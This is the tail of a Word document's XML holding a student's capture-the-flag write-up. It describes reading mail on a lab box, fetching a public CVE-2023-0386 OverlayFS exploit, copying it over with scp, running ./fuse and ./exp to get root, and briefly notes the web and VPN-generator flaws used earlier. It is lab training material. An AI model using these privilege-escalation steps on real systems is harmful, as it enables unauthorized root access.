            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD7E661" w14:textId="55385513" w:rsidR="004661F1" w:rsidRDefault="004661F1" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">The next step that the box wanted me to do, is to find the emails. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to do that I first go back directories to find </w:t>
      </w:r>
      <w:r w:rsidR="00FE2F20">
        <w:t>/var. Here will be the emails that are stored on this machine. To go back directories I go ahead and do cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FE2F20">
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FE2F20">
        <w:t xml:space="preserve"> cd.. twice and </w:t>
      </w:r>
      <w:r w:rsidR="00151354">
        <w:t>now cd into var/mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD46F2C" w14:textId="2388A87D" w:rsidR="00CC5DD2" w:rsidRDefault="00CC5DD2" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB48CC4" wp14:editId="6D025E98">
            <wp:extent cx="4946052" cy="4143375"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="184115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53051" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4947987" cy="4144996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E050420" w14:textId="45160C41" w:rsidR="00CC5DD2" w:rsidRDefault="00624041" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">It looks like from here that a </w:t>
      </w:r>
      <w:r w:rsidR="00A95E04">
        <w:t xml:space="preserve">recent security flaw was being addressed. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A95E04">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A95E04">
        <w:t xml:space="preserve"> I go ahead and see if </w:t>
      </w:r>
      <w:r w:rsidR="00874B02">
        <w:t>there’s</w:t>
      </w:r>
      <w:r w:rsidR="00A95E04">
        <w:t xml:space="preserve"> an exploitation in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A95E04">
        <w:t>OverlayFs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A95E04">
        <w:t xml:space="preserve"> Fuse. </w:t>
      </w:r>
      <w:r w:rsidR="00145757">
        <w:t xml:space="preserve">Luckly there is </w:t>
      </w:r>
      <w:r w:rsidR="00EB6021">
        <w:t xml:space="preserve">an exploit. </w:t>
      </w:r>
      <w:r w:rsidR="002F187B">
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="005744E1">
        <w:t xml:space="preserve"> since this is on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005744E1">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005744E1">
        <w:t xml:space="preserve">, we can </w:t>
      </w:r>
      <w:r w:rsidR="00E83CF2">
        <w:t>just get clone.</w:t>
      </w:r>
      <w:r w:rsidR="00F5041B">
        <w:t xml:space="preserve"> Here’s the website:</w:t>
      </w:r>
      <w:r w:rsidR="00E83CF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00F5041B" w:rsidRPr="00FE1312">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/xkaneiki/CVE-2023-0386/blob/main/exp.c</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F5041B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00234A5F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79E0E450" wp14:editId="596FB84F">
            <wp:extent cx="7501709" cy="2980647"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="24544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48143" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7531657" cy="2992546"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C880AB" w14:textId="3F973DBC" w:rsidR="00234A5F" w:rsidRDefault="006A6983" w:rsidP="00572446">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now that we cloned it, it looked like I had to zip it up since it didn’t let me just send it straight up, and from there I used this new command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I never heard of. I had to use the walkthrough on how to upload certain files</w:t>
      </w:r>
      <w:r w:rsidR="00826EF7">
        <w:t xml:space="preserve">. That’s also where I got the zip idea from. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868C61B" w14:textId="446E8C10" w:rsidR="00CB7512" w:rsidRDefault="00CB7512" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="600020BF" wp14:editId="033434FC">
            <wp:extent cx="5943600" cy="4259580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="156913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36223" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4259580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A542D2" w14:textId="41F61237" w:rsidR="00E152DD" w:rsidRDefault="00E152DD" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="182590AA" wp14:editId="664B22FE">
            <wp:extent cx="5943600" cy="4581525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10784410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1070" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4581525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E10E5E" w14:textId="49A0AEFD" w:rsidR="00824B2C" w:rsidRDefault="00E152DD" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">From here I began my exploit in hopes to gain root on the box. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BC4D1F">
        <w:t>First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BC4D1F">
        <w:t xml:space="preserve"> I look at the </w:t>
      </w:r>
      <w:r w:rsidR="00824B2C">
        <w:t xml:space="preserve">readme to see how to start this exploit. First it tells me to make all. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347AF593" w14:textId="2C141BDB" w:rsidR="00042205" w:rsidRDefault="00042205" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A7D6C3D" wp14:editId="2D3DC81E">
            <wp:extent cx="5943600" cy="3434715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="83343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34311" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3434715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E074E" w14:textId="6DC92553" w:rsidR="00042205" w:rsidRDefault="00042205" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">Then it tells me </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="004F71F2">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004F71F2">
        <w:t>/fuse and final ./exp.</w:t>
      </w:r>
      <w:r w:rsidR="009209A9">
        <w:t xml:space="preserve"> So that’s what I go ahead and do. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C243D5" w14:textId="50BB1971" w:rsidR="00F26481" w:rsidRDefault="00F26481" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34CBED07" wp14:editId="48812F93">
            <wp:extent cx="5943600" cy="3070225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2049989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9350" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3070225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0F1EE" w14:textId="203813D9" w:rsidR="00F26481" w:rsidRDefault="00F26481" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">We check our id, and boom root. From here I go back to the home directory and just look for the flag. </w:t>
      </w:r>
      <w:r w:rsidR="00914542">
        <w:t xml:space="preserve">I forgot where I was, but it ended </w:t>
      </w:r>
      <w:r w:rsidR="00453196">
        <w:t xml:space="preserve">up in the root home folder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109BE319" w14:textId="29B45FA3" w:rsidR="00453196" w:rsidRDefault="00453196" w:rsidP="00572446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07C5A977" wp14:editId="2D9A9BAA">
            <wp:extent cx="5943600" cy="4761865"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1115662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2776" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4761865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="532474B5" w14:textId="5FE43C98" w:rsidR="0047299D" w:rsidRPr="00C53985" w:rsidRDefault="00E57D9B" w:rsidP="00572446">
      <w:r>
        <w:t xml:space="preserve">The 2 exploits that could be cleared up is going to be </w:t>
      </w:r>
      <w:r w:rsidR="00B07598">
        <w:t xml:space="preserve">where we first became admin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B07598">
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B07598">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="009B46A0">
        <w:t xml:space="preserve">website. </w:t>
      </w:r>
      <w:r w:rsidR="00CC2BD6">
        <w:t xml:space="preserve">This is a coding issue that needs to be fixed. The second exploit that we used to get admin shell and find the username and password was through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC2BD6">
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC2BD6">
        <w:t xml:space="preserve"> generate. Through here I was able to import code that created a shell. So once again I believe that this is a coding issue that needs to be addressed somewhere amongst the code. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0047299D" w:rsidRPr="00C539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60"/>
    <w:rsid w:val="00003030"/>
    <w:rsid w:val="00035210"/>
    <w:rsid w:val="00042205"/>
    <w:rsid w:val="000573C5"/>
    <w:rsid w:val="00094CAD"/>
    <w:rsid w:val="000A1CD5"/>
    <w:rsid w:val="000A7D60"/>
    <w:rsid w:val="000B7658"/>
    <w:rsid w:val="000D6B6D"/>
    <w:rsid w:val="000E4A27"/>
    <w:rsid w:val="000F77B3"/>
    <w:rsid w:val="00145757"/>
    <w:rsid w:val="00145FC6"/>
    <w:rsid w:val="00151354"/>
    <w:rsid w:val="00151FA2"/>
    <w:rsid w:val="00153FBF"/>
    <w:rsid w:val="00174EA1"/>
    <w:rsid w:val="001D132F"/>
    <w:rsid w:val="001D25A7"/>
    <w:rsid w:val="001E4C8B"/>
    <w:rsid w:val="0021127C"/>
    <w:rsid w:val="0021318F"/>
    <w:rsid w:val="00220E5A"/>
    <w:rsid w:val="00223123"/>
    <w:rsid w:val="00233B35"/>
    <w:rsid w:val="00234A5F"/>
    <w:rsid w:val="0025451A"/>
    <w:rsid w:val="00261266"/>
    <w:rsid w:val="002626B2"/>
    <w:rsid w:val="00283D00"/>
    <w:rsid w:val="00290E48"/>
    <w:rsid w:val="002A2170"/>
    <w:rsid w:val="002F187B"/>
    <w:rsid w:val="003061DC"/>
    <w:rsid w:val="00315BD5"/>
    <w:rsid w:val="00323DC2"/>
    <w:rsid w:val="00367F31"/>
    <w:rsid w:val="003A5CC1"/>
    <w:rsid w:val="003D0E9A"/>
    <w:rsid w:val="00400A6E"/>
    <w:rsid w:val="00453196"/>
    <w:rsid w:val="004661F1"/>
    <w:rsid w:val="0047299D"/>
    <w:rsid w:val="00474E60"/>
    <w:rsid w:val="00477C0B"/>
    <w:rsid w:val="004860E5"/>
    <w:rsid w:val="00487846"/>
    <w:rsid w:val="004C4543"/>
    <w:rsid w:val="004D7AFF"/>
    <w:rsid w:val="004F71F2"/>
    <w:rsid w:val="00507928"/>
    <w:rsid w:val="00533589"/>
    <w:rsid w:val="00547DD8"/>
    <w:rsid w:val="005512AE"/>
    <w:rsid w:val="00572446"/>
    <w:rsid w:val="005744E1"/>
    <w:rsid w:val="005832CC"/>
    <w:rsid w:val="005841F3"/>
    <w:rsid w:val="00586197"/>
    <w:rsid w:val="00595836"/>
    <w:rsid w:val="005B7E9D"/>
    <w:rsid w:val="00624041"/>
    <w:rsid w:val="00664190"/>
    <w:rsid w:val="00683125"/>
    <w:rsid w:val="00694CC3"/>
    <w:rsid w:val="006A6983"/>
    <w:rsid w:val="006B1EF1"/>
    <w:rsid w:val="006B5EC1"/>
    <w:rsid w:val="006D25AE"/>
    <w:rsid w:val="006E7224"/>
    <w:rsid w:val="006F1226"/>
    <w:rsid w:val="007270D5"/>
    <w:rsid w:val="007466AA"/>
    <w:rsid w:val="00760AB0"/>
    <w:rsid w:val="007A4773"/>
    <w:rsid w:val="007C56A9"/>
    <w:rsid w:val="00810680"/>
    <w:rsid w:val="00816D2D"/>
    <w:rsid w:val="008204C7"/>
    <w:rsid w:val="00824B2C"/>
    <w:rsid w:val="00826EF7"/>
    <w:rsid w:val="008405BE"/>
    <w:rsid w:val="00843CBC"/>
    <w:rsid w:val="008649FA"/>
    <w:rsid w:val="00873908"/>
    <w:rsid w:val="00874B02"/>
    <w:rsid w:val="008B5F6F"/>
    <w:rsid w:val="008B7F5C"/>
    <w:rsid w:val="008C0EE1"/>
    <w:rsid w:val="008C5229"/>
    <w:rsid w:val="008D663B"/>
    <w:rsid w:val="008F3BC4"/>
    <w:rsid w:val="00914542"/>
    <w:rsid w:val="009209A9"/>
    <w:rsid w:val="00945D22"/>
    <w:rsid w:val="00960A65"/>
    <w:rsid w:val="009B46A0"/>
    <w:rsid w:val="009D02E4"/>
    <w:rsid w:val="009E323F"/>
    <w:rsid w:val="009E619E"/>
    <w:rsid w:val="009F431C"/>
    <w:rsid w:val="00A24587"/>
    <w:rsid w:val="00A72923"/>
    <w:rsid w:val="00A92C1D"/>
    <w:rsid w:val="00A94719"/>
    <w:rsid w:val="00A947E8"/>
    <w:rsid w:val="00A95E04"/>
    <w:rsid w:val="00AB2A23"/>
    <w:rsid w:val="00AC02AB"/>
    <w:rsid w:val="00AF30F3"/>
    <w:rsid w:val="00AF5473"/>
    <w:rsid w:val="00B02E90"/>
    <w:rsid w:val="00B07598"/>
    <w:rsid w:val="00B467DB"/>
    <w:rsid w:val="00B63AB1"/>
    <w:rsid w:val="00B72EC6"/>
    <w:rsid w:val="00B77706"/>
    <w:rsid w:val="00B94C70"/>
    <w:rsid w:val="00BA037D"/>
    <w:rsid w:val="00BA60CF"/>
    <w:rsid w:val="00BB6A20"/>
    <w:rsid w:val="00BC4D1F"/>
    <w:rsid w:val="00BE619C"/>
    <w:rsid w:val="00C01222"/>
    <w:rsid w:val="00C3159E"/>
    <w:rsid w:val="00C318E4"/>
    <w:rsid w:val="00C42810"/>
    <w:rsid w:val="00C43F40"/>
    <w:rsid w:val="00C53985"/>
    <w:rsid w:val="00C62492"/>
    <w:rsid w:val="00C764D1"/>
    <w:rsid w:val="00C91630"/>
    <w:rsid w:val="00CB402B"/>
    <w:rsid w:val="00CB6327"/>
    <w:rsid w:val="00CB7512"/>
    <w:rsid w:val="00CC2BD6"/>
    <w:rsid w:val="00CC5DD2"/>
    <w:rsid w:val="00CD1B47"/>
    <w:rsid w:val="00CD3399"/>
    <w:rsid w:val="00D45D88"/>
    <w:rsid w:val="00D51B33"/>
    <w:rsid w:val="00D56396"/>
    <w:rsid w:val="00D61294"/>
    <w:rsid w:val="00DA74E1"/>
    <w:rsid w:val="00DC1229"/>
    <w:rsid w:val="00DC4291"/>
    <w:rsid w:val="00DD389A"/>
    <w:rsid w:val="00DD3A71"/>
    <w:rsid w:val="00DF352A"/>
    <w:rsid w:val="00E14B7D"/>
    <w:rsid w:val="00E152DD"/>
    <w:rsid w:val="00E1569F"/>
    <w:rsid w:val="00E20F81"/>
    <w:rsid w:val="00E2587D"/>
    <w:rsid w:val="00E44D74"/>
    <w:rsid w:val="00E57D9B"/>
    <w:rsid w:val="00E65152"/>
    <w:rsid w:val="00E83CF2"/>
    <w:rsid w:val="00EB6021"/>
    <w:rsid w:val="00EC50B9"/>
    <w:rsid w:val="00ED4666"/>
    <w:rsid w:val="00EE472C"/>
    <w:rsid w:val="00EF6D60"/>
    <w:rsid w:val="00F26481"/>
    <w:rsid w:val="00F30049"/>
    <w:rsid w:val="00F348C8"/>
    <w:rsid w:val="00F5041B"/>
    <w:rsid w:val="00F504F1"/>
    <w:rsid w:val="00F93F40"/>
    <w:rsid w:val="00FC1C38"/>
    <w:rsid w:val="00FE2F20"/>
    <w:rsid w:val="00FF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D2BEF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9CDA84DC-4AE9-4A0D-AC14-9A2000929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D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7D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D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D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D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D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D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D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D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D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7D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D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D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D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D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D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D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D60"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="000A7D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D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D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D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D60"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="000A7D60"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000A7D60"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="000A7D60"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="000A7D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D60"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="000A7D60"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002626B2"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00262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mailto:admin@10.10.11.221" TargetMode="External"/><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rot13.com/" TargetMode="External"/><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xkaneiki/CVE-2023-0386/blob/main/exp.c" TargetMode="External"/><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21</Pages>
  <Words>1611</Words>
  <Characters>9189</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>76</Lines>
  <Paragraphs>21</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Esparza</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Emilio Esparza</cp:lastModifiedBy>
  <cp:revision>172</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-07T21:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-21T20:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>